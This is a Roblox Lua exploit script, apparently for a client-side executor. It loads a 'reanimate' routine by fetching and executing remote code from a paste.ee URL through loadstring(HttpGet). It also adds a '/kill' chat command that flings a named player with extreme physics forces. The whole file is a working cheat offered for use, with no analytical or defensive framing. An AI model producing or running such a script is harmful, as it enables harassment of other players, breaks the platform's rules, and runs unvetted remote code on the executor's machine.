function GetPlayer(name)
for i,v in pairs(game:GetService("Players"):GetPlayers()) do
if v.Name:lower():sub(1, #name) == name:lower() then
return v
end
end    
end

local plrs = game:GetService("Players")
local plr = plrs.LocalPlayer
local char = plr.Character
local hrp = char.HumanoidRootPart
local killing = false
local victim = nil

--Reanimate Process..
_G.UnReanimateKey = "q"
_G.ReanimateKey = "e"
_G.R6ToggleKey = "r"
_G.GodmodeToggleKey = "t"
_G.GodMode = true
_G.CharacterBug = false --Set to true if your uppertorso floats after executing when your R15.

if char:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R15 then
_G.R6 = true
else
_G.R6 = false
end

_G.AutoReanimate = true

loadstring(game:HttpGet("https://paste.ee/r/e4oZ2/0"))()

hrp.Name = "hi"
hrp.Transparency = 0
hrp.Anchored = false
if hrp:FindFirstChildOfClass("AlignPosition") then
hrp:FindFirstChildOfClass("AlignPosition"):Destroy()
end
if hrp:FindFirstChildOfClass("AlignOrientation") then
hrp:FindFirstChildOfClass("AlignOrientation"):Destroy()
end
local bp = Instance.new("BodyPosition", hrp)
bp.D = 9999999
bp.P = 999999999999999
bp.MaxForce = Vector3.new(math.huge,math.huge,math.huge)
flinger = Instance.new("BodyAngularVelocity",hrp)
flinger.MaxTorque = Vector3.new(math.huge,math.huge,math.huge)
flinger.P = 1000000000000000000000000000
flinger.AngularVelocity = Vector3.new(10000,10000,10000)

plr.Chatted:Connect(function(msg)
if string.sub(msg, 1, 6) == "/kill " then
if plrs:FindFirstChild(string.sub(msg, 7)) then
victim = plrs:FindFirstChild(string.sub(msg, 7))
killing = true
wait(3)
killing = false
else
if GetPlayer(string.sub(msg, 7)) then
victim = GetPlayer(string.sub(msg, 7))
killing = true
wait(3)
killing = false
else
print("Player not found!")
end
end
end
end)

plrs.PlayerRemoving:Connect(function(player)
if player == victim then
killing = false
end
end)

spawn(function()
while game:GetService("RunService").Heartbeat:Wait() do
if killing == false then
bp.Position = char.NullwareReanim.Torso.Position
else
if victim.Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then
bp.Position = victim.Character.Torso.Position
else
bp.Position = victim.Character.UpperTorso.Position
end
end
end
end)